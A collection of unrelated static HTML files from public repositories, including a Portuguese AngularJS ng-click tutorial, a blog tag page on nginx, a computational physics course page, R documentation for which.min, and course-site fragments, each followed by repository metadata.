target="_top">Frames</a></li> <li><a href="WriterGraph.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Licenced under the Apache License, Version 2.0</small></p> </body> </html>
slennie12/SOR-Onderzoek
apache-jena-3.0.0/javadoc-arq/org/apache/jena/sparql/sse/writers/class-use/WriterGraph.html
HTML
cc0-1.0
4,762
<!DOCTYPE html> <html lang="pt-br"> <head prefix="og: http://ogp.me/ns#"> <meta charset="utf-8"> <title>Diretiva ng-click | Academia Webdev</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Canonical links --> <link rel="canonical" href="https://jacksongomesbr.github.com/academia-webdev/angularjs/ng-click.html"> <!-- Icon --> <link rel="apple-touch-icon" sizes="57x57" href="/academia-webdev/icon/apple-touch-icon-57x57.png"> <link rel="apple-touch-icon" sizes="114x114" href="/academia-webdev/icon/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="/academia-webdev/icon/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="144x144" href="/academia-webdev/icon/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="60x60" href="/academia-webdev/icon/apple-touch-icon-60x60.png"> <link rel="apple-touch-icon" sizes="120x120" href="/academia-webdev/icon/apple-touch-icon-120x120.png"> <link rel="apple-touch-icon" sizes="76x76" href="/academia-webdev/icon/apple-touch-icon-76x76.png"> <link rel="apple-touch-icon" sizes="152x152" href="/academia-webdev/icon/apple-touch-icon-152x152.png"> <link rel="icon" type="image/png" href="/academia-webdev/icon/favicon-196x196.png" sizes="196x196"> <link rel="icon" type="image/png" href="/academia-webdev/icon/favicon-160x160.png" sizes="160x160"> <link rel="icon" type="image/png" href="/academia-webdev/icon/favicon-96x96.png" sizes="96x96"> <link rel="icon" type="image/png" href="/academia-webdev/icon/favicon-16x16.png" sizes="16x16"> <link rel="icon" type="image/png" href="/academia-webdev/icon/favicon-32x32.png" sizes="32x32"> <meta name="msapplication-TileColor" content="#2f83cd"> <meta name="msapplication-TileImage" content="/academia-webdev/icon/mstile-144x144.png"> <!-- CSS --> <!-- build:css build/css/navy.css --> <link rel="stylesheet" href="/academia-webdev/css/navy.css" type="text/css"> <!-- endbuild --> <link href="//fonts.googleapis.com/css?family=Lato:300,400,700" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css"> <!-- RSS --> <link rel="alternative" href="/academia-webdev/atom.xml" title="Academia Webdev" type="application/atom+xml"> <!-- Open Graph --> <meta name="description" content="A diretiva ng-click é utilizada para representar um comportamento de clique do mouse em um elemento, por exemplo um botão. O conteúdo da diretiva (o atributo) é um código JavaScript. O exemplo a segui"> <meta property="og:type" content="website"> <meta property="og:title" content="Diretiva ng-click"> <meta property="og:url" content="https://jacksongomesbr.github.com/academia-webdev/angularjs/ng-click.html"> <meta property="og:site_name" content="Academia Webdev"> <meta property="og:description" content="A diretiva ng-click é utilizada para representar um comportamento de clique do mouse em um elemento, por exemplo um botão. O conteúdo da diretiva (o atributo) é um código JavaScript. O exemplo a segui"> <meta property="og:updated_time" content="2015-10-14T20:25:01.858Z"> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Diretiva ng-click"> <meta name="twitter:description" content="A diretiva ng-click é utilizada para representar um comportamento de clique do mouse em um elemento, por exemplo um botão. O conteúdo da diretiva (o atributo) é um código JavaScript. O exemplo a segui"> <meta name="twitter:site" content="jacksongomes"> <meta property="fb:admins" content="100000247608790"> <!-- Swiftype --> <meta class="swiftype" name="title" data-type="string" content="Diretiva ng-click"> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4910098-10', 'auto'); ga('send', 'pageview'); </script> </head> <body class=""> <div id="container"> <header id="header" class="wrapper"> <div id="header-inner" class="inner"> <h1 id="logo-wrap"> <a href="/" id="logo">Hexo</a> </h1> <nav id="main-nav"> <ul> <li class="main-nav-item"><a href="/academia-webdev/fundamentos/" class="main-nav-link">Fundamentos</a></li><li class="main-nav-item"><a href="/academia-webdev/news/" class="main-nav-link">News</a></li><li class="main-nav-item"><a href="/academia-webdev/angularjs/" class="main-nav-link">AngularJS</a></li><li class="main-nav-item"><a href="/academia-webdev/bootstrap/" class="main-nav-link">Bootstrap</a></li> <li class="main-nav-item"> <a href="https://github.com/jacksongomesbr/academia-webdev" class="main-nav-link"><i class="fa fa-github-alt"></i></a> </li> </ul> </nav> <div id="search-btn-wrap" class="main-nav-item"> <a id="search-btn" class="main-nav-link st-search-launcher"><i class="fa fa-search"></i></a> </div> <a id="mobile-nav-toggle"> <span class="mobile-nav-toggle-bar"></span> <span class="mobile-nav-toggle-bar"></span> <span class="mobile-nav-toggle-bar"></span> </a> <a id="mobile-search-btn" class="st-search-launcher"></a> </div> </header> <div id="content-wrap"> <div id="content" class="wrapper"> <div id="content-inner"> <article class="article-container" itemscope itemtype="http://schema.org/Article"> <div class="article-inner"> <div class="article"> <div class="inner"> <header class="article-header"> <h1 class="article-title" itemprop="name">Diretiva ng-click</h1> <a href="https://github.com/jacksongomesbr/academia-webdev/edit/master/source/angularjs/ng-click.md" class="article-edit-link" title="Melhorar esta documentação"><i class="fa fa-pencil"></i></a> </header> <div class="article-content" itemprop="articleBody" data-swiftype-index="true"> <p>A diretiva <code>ng-click</code> é utilizada para representar um comportamento de clique do mouse em um elemento, por exemplo um botão. O conteúdo da diretiva (o atributo) é um código JavaScript. O exemplo a seguir demonstra a utilização desta diretiva.</p> <iframe src="http://embed.plnkr.co/b3R5JbdIintYmk8HUkcx/preview" width="100%" height="300"></iframe> <p>No controller, no arquivo <code>app.js</code>, na linha 6 é definida a função <code>salvar()</code>, que aceita como parâmetro o nome da cidade a ser inserida no vetor <code>cidades</code>.</p> <p>Na view, no arquivo <code>index.html</code>, na linha 42 está presente o elemento <code>button</code> e nele é aplicada a diretiva <code>ng-click</code>. Neste caso, a diretiva indica que será chamada a função <code>salvar()</code> passando como parâmetro o model <code>nova_cidade</code> (vinculado ao <code>input</code> da linha 40) e, posteriormente, o valor do model será uma string vazia.</p> <blockquote class="note info"><strong class="note-title">Exercício</strong><p>O exemplo anterior implementa parte das funcionalidades de um CRUD. Neste caso, está implementando a consulta (listagem dos dados) e o cadastro. Implemente a funcionalidade de excluir uma cidade.</p> </blockquote> </div> <footer class="article-footer"> <time class="article-footer-updated" datetime="2015-10-14T20:25:01.858Z" itemprop="dateModified">Última atualização: 2015-10-14</time> <a href="ng-repeat.html" class="article-footer-prev" title="Diretiva ng-repeat"><i class="fa fa-chevron-left"></i><span>Anterior</span></a><a href="ng-show-hide.html" class="article-footer-next" title="Diretivas ng-show e ng-hide"><span>Próximo</span><i class="fa fa-chevron-right"></i></a> </footer> <section id="comments"> <div id="disqus_thread"></div> </section> <script> var disqus_shortname = 'academiawebdev'; var disqus_url = 'https://jacksongomesbr.github.com/academia-webdev/angularjs/ng-click.html'; var disqus_title = "Diretiva ng-click"; var disqus_config = function(){ this.language = 'pt_BR'; }; (function(){ var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//go.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); </script> </div> </div> <aside id="article-toc" role="navigation"> <div id="article-toc-inner"> <strong class="sidebar-title">Conteúdo</strong> <a href="#" id="article-toc-top">Voltar para o topo</a> </div> </aside> </div> </article> <aside id="sidebar" role="navigation"> <div class="inner"><strong class="sidebar-title">Iniciando</strong><a href="index.html" class="sidebar-link">Visão geral</a><a href="iniciando.html" class="sidebar-link">Iniciando</a><a href="ng-repeat.html" class="sidebar-link">Diretiva ng-repeat</a><a href="ng-click.html" class="sidebar-link current">Diretiva ng-click</a><a href="ng-show-hide.html" class="sidebar-link">Diretivas ng-show e ng-hide</a><a href="model-complexo.html" class="sidebar-link">Model complexo</a><a href="form-validacao.html" class="sidebar-link">Validação de formulários</a></div> </aside> </div> </div> </div> <footer id="footer" class="wrapper"> <div class="inner"> <div id="footer-copyright"> &copy; 2015 <a href="http://jacksongomesbr.github.com/" target="_blank">Jackson Gomes</a><br> Licenciado sob <a href="http://creativecommons.org/licenses/by/4.0/" target="_blank">CC BY 4.0</a>. </div> <div id="footer-links"> <a href="https://twitter.com/jacksongomes" class="footer-link" target="_blank"><i class="fa fa-twitter"></i></a> <a href="https://github.com/jacksongomesbr/academia-webdev" class="footer-link" target="_blank"><i class="fa fa-github-alt"></i></a> </div> </div> </footer> </div> <div id="mobile-nav-dimmer"></div> <nav id="mobile-nav"> <div id="mobile-nav-inner"> <ul id="mobile-nav-list"> <li class="mobile-nav-item"><a href="/academia-webdev/fundamentos/" class="mobile-nav-link">Fundamentos</a></li><li class="mobile-nav-item"><a href="/academia-webdev/news/" class="mobile-nav-link">News</a></li><li class="mobile-nav-item"><a href="/academia-webdev/angularjs/" class="mobile-nav-link">AngularJS</a></li><li class="mobile-nav-item"><a href="/academia-webdev/bootstrap/" class="mobile-nav-link">Bootstrap</a></li> <li class="mobile-nav-item"> <a href="https://github.com/jacksongomesbr/academia-webdev" class="mobile-nav-link" rel="external" target="_blank">GitHub</a> </li> </ul> <strong class="mobile-nav-title">Iniciando</strong><a href="index.html" class="mobile-nav-link">Visão geral</a><a href="iniciando.html" class="mobile-nav-link">Iniciando</a><a href="ng-repeat.html" class="mobile-nav-link">Diretiva ng-repeat</a><a href="ng-click.html" class="mobile-nav-link current">Diretiva ng-click</a><a href="ng-show-hide.html" class="mobile-nav-link">Diretivas ng-show e ng-hide</a><a href="model-complexo.html" class="mobile-nav-link">Model complexo</a><a href="form-validacao.html" class="mobile-nav-link">Validação de formulários</a> </div> <div id="mobile-lang-select-wrap"> <span id="mobile-lang-select-label"><i class="fa fa-globe"></i><span>Português</span></span> <select id="mobile-lang-select" data-canonical=""> <option value="en">English</option> <option value="pt-br" selected>Português</option> </select> </div> </nav> <!-- Scripts --> <!-- build:js build/js/main.js --> <script src="/academia-webdev/js/lang_select.js" type="text/javascript"></script> <script src="/academia-webdev/js/toc.js" type="text/javascript"></script> <script src="/academia-webdev/js/mobile_nav.js" type="text/javascript"></script> <!-- endbuild --> <script src="//cdn.jsdelivr.net/retinajs/1.1.0/retina.min.js" async></script> <!-- Swiftype --> <script type="text/javascript"> (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){ (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t); e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e); })(window,document,'script','//s.swiftypecdn.com/install/v1/st.js','_st'); _st('install','EwN4HMy_KMxTK_GMjV1z'); </script> </body> </html>
jacksongomesbr/academia-webdev
angularjs/ng-click.html
HTML
cc0-1.0
12,851
<head> <meta charset="utf-8"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>web server - Coding is Poetry</title> <meta name="HandheldFriendly" content="True"> <meta name="MobileOptimized" content="320"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="description" content=""> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="web server - Coding is Poetry"> <meta name="twitter:description" content=""> <meta property="og:url" content="http://nmrony.info"> <meta property="og:type" content="article"> <meta property="og:title" content="web server - Coding is Poetry"> <meta property="og:description" content=""> <meta property="og:site_name" content="Coding is Poetry"> <meta itemprop="name" content="web server - Coding is Poetry"> <meta itemprop="description" content=""> <meta name="twitter:site" content="@nmrony"> <meta name="twitter:creator" content="@nmrony"> <meta property="article:author" content="https://www.facebook.com/nmrony"> <meta name="google-site-verification" content=""> <meta name="theme-color" content=""> <link href="../../favicon.ico" rel="shortcut icon" type="image/x-icon"> <link href="../../apple-touch-icon-precomposed.png" rel="apple-touch-icon"> <link href="http://fonts.googleapis.com/" rel="dns-prefetch"> <link href="http://fonts.googleapis.com/css?family=Noto+Serif:400,700,400italic%7COpen+Sans:700,400&amp;subset=latin,latin-ext" rel="stylesheet"> <link rel="stylesheet" href="../../assets/css/main.min.css?v=a04fd632d9"> <script type="text/javascript" src="https://code.jquery.com/jquery-1.11.3.min.js"></script> <script type="text/javascript"> var ga_ua = 'UA-73097824-1'; var disqus_shortname = 'nmrony'; var enable_pjax = true; // Pace Options // ============== window.paceOptions = { catchupTime: 100, minTime: 100, elements: false, restartOnRequestAfter: 500, startOnPageLoad: false } // Ghostium Globals // ============== window.GHOSTIUM = {}; GHOSTIUM.haveGA = typeof ga_ua !== 'undefined' && ga_ua !== 'UA-XXXXX-X'; GHOSTIUM.haveDisqus = typeof disqus_shortname !== 'undefined' && disqus_shortname !== 'example'; GHOSTIUM.enablePjax = typeof enable_pjax !== 'undefined' ? enable_pjax : true; </script> <script src="../../assets/js/head-scripts.min.js?v=a04fd632d9"></script> <link rel="canonical" href="index.html"> <meta name="referrer" content="origin-when-cross-origin"> <meta property="og:site_name" content="Coding is Poetry"> <meta property="og:type" content="website"> <meta property="og:title" content="web server - Coding is Poetry"> <meta property="og:url" content="http://nmrony.info/tag/web-server/"> <meta property="article:modified_time" content="2016-09-09T19:12:10.000Z"> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="web server - Coding is Poetry"> <meta name="twitter:url" content="http://nmrony.info/tag/web-server/"> <meta name="twitter:site" content="@nmrony"> <script type="application/ld+json"> { "@context": "https://schema.org", "@type": "Series", "publisher": "Coding is Poetry", "url": "http://nmrony.info/tag/web-server/", "name": "web server" } </script> <meta name="generator" content="Ghost 0.9"> <link rel="alternate" type="application/rss+xml" title="Coding is Poetry" href="../../rss/index.html"> </head> <body class="tag-template tag-web-server"> <button data-action="open-drawer" id="drawer-button" class="drawer-button"><i class="fa fa-bars"></i></button> <nav tabindex="-1" class="drawer"> <div class="drawer-container"> <!--.drawer-search(role="search")--> <ul role="navigation" class="drawer-list"> <li class="drawer-list-item"> <a href="../../" data-pjax> <i class="fa fa-home"></i>Home </a> </li> <li class="drawer-list-item"> <a href="../../rss/index.rss" target="_blank" rel="noopener"> <i class="fa fa-rss"></i>Subscribe to Feed </a> </li> <li class="drawer-list-divider"> <li class="drawer-list-item drawer-list-title"> Follow me </li> <li class="drawer-list-item"> <a href="https://twitter.com/nmrony" target="_blank" rel="noopener"> <i class="fa fa-twitter"></i>Twitter </a> </li> <li class="drawer-list-item"> <a href="https://github.com/nmrony" target="_blank" rel="noopener"> <i class="fa fa-github"></i>Github </a> </li> <li class="drawer-list-item"> <a href="https://stackoverflow.com/cv/nmrony" target="_blank" rel="noopener"> <i class="fa fa-stack-overflow"></i>Stackoverflow </a> </li> </ul> </div> </nav> <div class="drawer-overlay"></div> <main id="container" role="main" class="container"> <div class="surface"> <div class="surface-container"> <div data-pjax-container class="content"> <aside role="banner" class="cover"> <div data-load-image="/content/images/2016/08/home-bg.jpg" class="cover-image"></div> <div class="cover-container"> <a href="../../" class="cover-logo" data-pjax> <img src="../../content/images/2016/08/rony.jpg" alt="Blog Logo"> </a> <h1 class="cover-title">Coding is Poetry</h1> <p class="cover-description">Thoughts, stories and ideas.</p> </div> </aside> <section class="wrapper" tabindex="0"> <div class="wrapper-container"> <header> <p></p><h2>Posts tagged with <i>web server</i></h2> <hr> </header> <section class="post-list"> <article itemscope itemtype="http://schema.org/BlogPosting" role="article" class="post-item post tag-nginx tag-howto tag-php tag-latest tag-web-server"> <header class="post-item-header"> <h2 itemprop="name" class="post-item-title"> <a href="../../configuring-nginx-virtual-host-with-php-7-0/" itemprop="url" data-pjax title="Configuring Nginx Virtual Host with PHP 7.0"> Configuring Nginx Virtual Host with PHP 7.0 </a> </h2> </header> <section itemprop="description" class="post-item-excerpt"> <p>I was super excited about PHP 7.0 and started using it as soon it was getting some shape. But I also faced some problem while I was configuring PHP 7.0 with Nginx. I…</p> </section> <footer class="post-item-footer"> <ul class="post-item-meta-list"> <li class="post-item-meta-item"> <time datetime="2016-02-02" itemprop="datePublished"> 7 months ago </time> </li> <li class="post-item-meta-item"> <a itemprop="articleSection" href="../nginx/" data-pjax>nginx</a>, <a itemprop="keywords" href="../howto/" data-pjax>howto</a>, <a itemprop="keywords" href="../php/" data-pjax>php</a>, <a itemprop="keywords" href="../latest/" data-pjax>latest</a>, <a itemprop="keywords" href="index.html" data-pjax>web server</a> </li> <li class="post-item-meta-item"> <a href="../../configuring-nginx-virtual-host-with-php-7-0/index.html#disqus_thread" data-pjax data-disqus-identifier="22">Comments</a> </li> </ul> </footer> </article> </section> <nav role="pagination" class="post-list-pagination"> <span class="post-list-pagination-item post-list-pagination-item-current">Page 1 of 1</span> </nav> <footer role="contentinfo" class="footer"> <p><small>© 2016. All Rights Reserved.</small></p> <p><small>Proudly published with <a href="http://ghost.org" target="_blank">Ghost</a></small></p> </footer> </div> </section> </div> </div> </div> </main> <script src="../../assets/js/foot-scripts.min.js?v=a04fd632d9"></script> <script type="text/javascript"> if(GHOSTIUM.haveGA) { (function(g,h,o,s,t,z){g.GoogleAnalyticsObject=s;g[s]||(g[s]= function(){(g[s].q=g[s].q||[]).push(arguments)});g[s].s=+new Date; t=h.createElement(o);z=h.getElementsByTagName(o)[0]; t.src='//www.google-analytics.com/analytics.js'; z.parentNode.insertBefore(t,z)}(window,document,'script','ga')); ga('create',ga_ua);ga('send','pageview'); } if(GHOSTIUM.haveDisqus) { (function () { var s = document.createElement('script'); s.async = true; s.type = 'text/javascript'; s.src = '//' + disqus_shortname + '.disqus.com/count.js'; (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s); }()); } </script> </body>
nmrony/nmrony.info
tag/web-server/index.html
HTML
cc0-1.0
8,938
<!-- Automatically generated HTML file from DocOnce source (https://github.com/hplgit/doconce/) --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="DocOnce: https://github.com/hplgit/doconce/" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="description" content="Computational Physics Lectures: Introduction to the course"> <title>Computational Physics Lectures: Introduction to the course</title> <!-- Bootstrap style: bootstrap --> <link href="https://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet"> <!-- not necessary <link href="https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet"> --> <style type="text/css"> /* Add scrollbar to dropdown menus in bootstrap navigation bar */ .dropdown-menu { height: auto; max-height: 400px; overflow-x: hidden; } /* Adds an invisible element before each target to offset for the navigation bar */ .anchor::before { content:""; display:block; height:50px; /* fixed header height for style bootstrap */ margin:-50px 0 0; /* negative fixed header height */ } </style> </head> <!-- tocinfo {'highest level': 2, 'sections': [('Overview of first week', 2, None, '___sec0'), ('Reading suggestions and exercises', 2, None, '___sec1'), ('Lectures and ComputerLab', 2, None, '___sec2'), ('Course Format', 2, None, '___sec3'), ('Teachers and ComputerLab', 2, None, '___sec4'), ('Deadlines for projects (end of day, tentative deadlines)', 2, None, '___sec5'), ('Topics covered in this course', 2, None, '___sec6'), ('Syllabus', 2, None, '___sec7'), ('Syllabus', 2, None, '___sec8'), ('Syllabus', 2, None, '___sec9'), ('Syllabus', 2, None, '___sec10'), ('Syllabus', 2, None, '___sec11'), ('Syllabus', 2, None, '___sec12'), ('Overarching aims of this course', 2, None, '___sec13'), ('Additional learning outcomes', 2, None, '___sec14'), ('Computing knowledge', 2, None, '___sec15'), ('And, there is nothing like a code which gives correct ' 'results!!', 2, None, '___sec16'), ('Other courses in Computational Science at UiO', 2, None, '___sec17'), ('Extremely useful tools, strongly recommended', 2, None, '___sec18')]} end of tocinfo --> <body> <!-- Bootstrap navigation bar --> <div class="navbar navbar-default navbar-fixed-top"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="intro-bs.html">Computational Physics Lectures: Introduction to the course</a> </div> <div class="navbar-collapse collapse navbar-responsive-collapse"> <ul class="nav navbar-nav navbar-right"> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown">Contents <b class="caret"></b></a> <ul class="dropdown-menu"> <!-- navigation toc: --> <li><a href="._intro-bs001.html#___sec0" style="font-size: 80%;">Overview of first week</a></li> <!-- navigation toc: --> <li><a href="#___sec1" style="font-size: 80%;">Reading suggestions and exercises</a></li> <!-- navigation toc: --> <li><a href="._intro-bs003.html#___sec2" style="font-size: 80%;">Lectures and ComputerLab</a></li> <!-- navigation toc: --> <li><a href="._intro-bs004.html#___sec3" style="font-size: 80%;">Course Format</a></li> <!-- navigation toc: --> <li><a href="._intro-bs005.html#___sec4" style="font-size: 80%;">Teachers and ComputerLab</a></li> <!-- navigation toc: --> <li><a href="._intro-bs006.html#___sec5" style="font-size: 80%;">Deadlines for projects (end of day, tentative deadlines)</a></li> <!-- navigation toc: --> <li><a href="._intro-bs007.html#___sec6" style="font-size: 80%;">Topics covered in this course</a></li> <!-- navigation toc: --> <li><a href="._intro-bs008.html#___sec7" style="font-size: 80%;">Syllabus</a></li> <!-- navigation toc: --> <li><a href="._intro-bs009.html#___sec8" style="font-size: 80%;">Syllabus</a></li> <!-- navigation toc: --> <li><a href="._intro-bs010.html#___sec9" style="font-size: 80%;">Syllabus</a></li> <!-- navigation toc: --> <li><a href="._intro-bs011.html#___sec10" style="font-size: 80%;">Syllabus</a></li> <!-- navigation toc: --> <li><a href="._intro-bs012.html#___sec11" style="font-size: 80%;">Syllabus</a></li> <!-- navigation toc: --> <li><a href="._intro-bs013.html#___sec12" style="font-size: 80%;">Syllabus</a></li> <!-- navigation toc: --> <li><a href="._intro-bs014.html#___sec13" style="font-size: 80%;">Overarching aims of this course</a></li> <!-- navigation toc: --> <li><a href="._intro-bs015.html#___sec14" style="font-size: 80%;">Additional learning outcomes</a></li> <!-- navigation toc: --> <li><a href="._intro-bs016.html#___sec15" style="font-size: 80%;">Computing knowledge</a></li> <!-- navigation toc: --> <li><a href="._intro-bs017.html#___sec16" style="font-size: 80%;">And, there is nothing like a code which gives correct results!!</a></li> <!-- navigation toc: --> <li><a href="._intro-bs018.html#___sec17" style="font-size: 80%;">Other courses in Computational Science at UiO</a></li> <!-- navigation toc: --> <li><a href="._intro-bs019.html#___sec18" style="font-size: 80%;">Extremely useful tools, strongly recommended</a></li> </ul> </li> </ul> </div> </div> </div> <!-- end of navigation bar --> <div class="container"> <p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p> <!-- add vertical space --> <a name="part0002"></a> <!-- !split --> <h2 id="___sec1" class="anchor">Reading suggestions and exercises </h2> <p> <div class="panel panel-default"> <div class="panel-body"> <p> <!-- subsequent paragraphs come in larger fonts, so start with a paragraph --> <ul> <li> Introduction to C++ programming</li> <li> Numerical precision and C++ programming (chapter 2 of lecture notes)</li> <li> Numerical differentiation and loss of numerical precision (chapter 3 lecture notes)</li> </ul> </div> </div> <p> <p> <!-- navigation buttons at the bottom of the page --> <ul class="pagination"> <li><a href="._intro-bs001.html">&laquo;</a></li> <li><a href="._intro-bs000.html">1</a></li> <li><a href="._intro-bs001.html">2</a></li> <li class="active"><a href="._intro-bs002.html">3</a></li> <li><a href="._intro-bs003.html">4</a></li> <li><a href="._intro-bs004.html">5</a></li> <li><a href="._intro-bs005.html">6</a></li> <li><a href="._intro-bs006.html">7</a></li> <li><a href="._intro-bs007.html">8</a></li> <li><a href="._intro-bs008.html">9</a></li> <li><a href="._intro-bs009.html">10</a></li> <li><a href="._intro-bs010.html">11</a></li> <li><a href="._intro-bs011.html">12</a></li> <li><a href="">...</a></li> <li><a href="._intro-bs019.html">20</a></li> <li><a href="._intro-bs003.html">&raquo;</a></li> </ul> <!-- ------------------- end of main content --------------- --> </div> <!-- end container --> <!-- include javascript, jQuery *first* --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script src="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script> <!-- Bootstrap footer <footer> <a href="http://..."><img width="250" align=right src="http://..."></a> </footer> --> <center style="font-size:80%"> <!-- copyright only on the titlepage --> </center> </body> </html>
CompPhysics/ComputationalPhysics
doc/pub/intro/html/._intro-bs002.html
HTML
cc0-1.0
8,044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>R: Where is the Min() or Max() or first TRUE or FALSE ?</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="R.css" /> </head><body> <table width="100%" summary="page for which.min {base}"><tr><td>which.min {base}</td><td style="text-align: right;">R Documentation</td></tr></table> <h2>Where is the Min() or Max() or first TRUE or FALSE ?</h2> <h3>Description</h3> <p>Determines the location, i.e., index of the (first) minimum or maximum of a numeric (or logical) vector. </p> <h3>Usage</h3> <pre> which.min(x) which.max(x) </pre> <h3>Arguments</h3> <table summary="R argblock"> <tr valign="top"><td><code>x</code></td> <td> <p>numeric (logical, integer or double) vector or an <span style="font-family: Courier New, Courier; color: #666666;"><b>R</b></span> object for which the internal coercion to <code><a href="double.html">double</a></code> works whose <code><a href="Extremes.html">min</a></code> or <code><a href="Extremes.html">max</a></code> is searched for.</p> </td></tr> </table> <h3>Value</h3> <p>Missing and <code>NaN</code> values are discarded. </p> <p>an <code><a href="integer.html">integer</a></code> or on 64-bit platforms, if <code><a href="length.html">length</a>(x) =: n</code><i>&gt;= 2^31</i> an integer valued <code><a href="double.html">double</a></code> of length 1 or 0 (iff <code>x</code> has no non-<code>NA</code>s), giving the index of the <em>first</em> minimum or maximum respectively of <code>x</code>. </p> <p>If this extremum is unique (or empty), the results are the same as (but more efficient than) <code>which(x == min(x, na.rm = TRUE))</code> or <code>which(x == max(x, na.rm = TRUE))</code> respectively. </p> <h3>Logical <code>x</code> &ndash; First <code>TRUE</code> or <code>FALSE</code></h3> <p>For a <code><a href="logical.html">logical</a></code> vector <code>x</code> with both <code>FALSE</code> and <code>TRUE</code> values, <code>which.min(x)</code> and <code>which.max(x)</code> return the index of the first <code>FALSE</code> or <code>TRUE</code>, respectively, as <code>FALSE &lt; TRUE</code>. However, <code>match(FALSE, x)</code> or <code>match(TRUE, x)</code> are typically <em>preferred</em>, as they do indicate mismatches. </p> <h3>Author(s)</h3> <p>Martin Maechler</p> <h3>See Also</h3> <p><code><a href="which.html">which</a></code>, <code><a href="maxCol.html">max.col</a></code>, <code><a href="Extremes.html">max</a></code>, etc. </p> <p>Use <code><a href="which.html">arrayInd</a>()</code>, if you need array/matrix indices instead of 1D vector ones. </p> <p><code><a href="../../nnet/html/which.is.max.html">which.is.max</a></code> in package <a href="https://CRAN.R-project.org/package=nnet"><span class="pkg">nnet</span></a> differs in breaking ties at random (and having a &lsquo;fuzz&rsquo; in the definition of ties). </p> <h3>Examples</h3> <pre> x &lt;- c(1:4, 0:5, 11) which.min(x) which.max(x) ## it *does* work with NA's present, by discarding them: presidents[1:30] range(presidents, na.rm = TRUE) which.min(presidents) # 28 which.max(presidents) # 2 ## Find the first occurrence, i.e. the first TRUE, if there is at least one: x &lt;- rpois(10000, lambda = 10); x[sample.int(50, 20)] &lt;- NA ## where is the first value &gt;= 20 ? which.max(x &gt;= 20) ## Also works for lists (which can be coerced to numeric vectors): which.min(list(A = 7, pi = pi)) ## -&gt; c(pi = 2L) </pre> <hr /><div style="text-align: center;">[Package <em>base</em> version 3.6.1 <a href="00Index.html">Index</a>]</div> </body></html>
ColumbusCollaboratory/electron-quick-start
R-Portable-Win/library/base/html/which.min.html
HTML
cc0-1.0
3,871
<!DOCTYPE html> <html lang="en-us"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="Hugo 0.27.1" /> <title>Fall 2017 - STOR 831 Course site</title> <meta property="og:title" content="Fall 2017 - STOR 831 Course site"> <link href="/tags/fall-2017/index.xml" rel="alternate" type="application/rss+xml" title="STOR 831 Course site" /> <link rel="stylesheet" href="/css/fonts.css" media="all"> <link rel="stylesheet" href="/css/main.css" media="all"> </head> <body> <div class="wrapper"> <header class="header"> <nav class="nav"> <a href="/" class="nav-logo"> <img src="/images/dog.png" width="50" height="50" alt="Logo"> </a> <ul class="nav-links"> <li><a href="/about/">About</a></li> <li><a href="/post/">Main page</a></li> <li><a href="http://shankarbhamidi.web.unc.edu/">Shankar home page</a></li> </ul> </nav> </header> <main class="content" role="main"> <div class="archive"> <h2 class="archive-title">2017</h2> <article class="archive-item"> <a href="/2017/09/12/stor-831-fall-2017-schedule/" class="archive-item-link">STOR 831 Fall 2017 Schedule</a> <span class="archive-item-date"> 